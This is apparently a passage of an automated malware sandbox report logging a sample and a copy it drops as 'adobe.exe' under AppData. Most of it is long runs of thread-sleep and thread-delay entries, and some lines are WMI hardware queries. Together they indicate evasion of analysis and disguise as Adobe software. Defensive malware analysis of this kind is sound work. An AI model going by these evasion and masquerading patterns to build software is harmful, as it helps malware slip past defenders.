                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -594044s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -593927s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe TID: 4180Thread sleep time: -593688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5256Thread sleep count: 7081 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5256Thread sleep count: 2758 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -598016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -597031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596812s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -596047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595895s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595535s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595418s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -595078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594640s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594531s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594385s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 5240Thread sleep time: -594271s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3932Thread sleep count: 1231 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3932Thread sleep count: 8615 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597779s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597123s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -597016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -596000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -595015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -594906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -594797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -594686s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 3648Thread sleep time: -594578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598828Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598718Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597265Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597141Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 597032Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596907Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596771Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596478Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596326Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 595079Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594969Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594305Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594171Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 594044Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 593927Jump to behavior
                    Source: C:\Users\user\Desktop\ukBQ4ch2nE.exeThread delayed: delay time: 593688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595895Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595535Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595418Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594640Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594385Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594271Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597779Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597453Jump to behavior
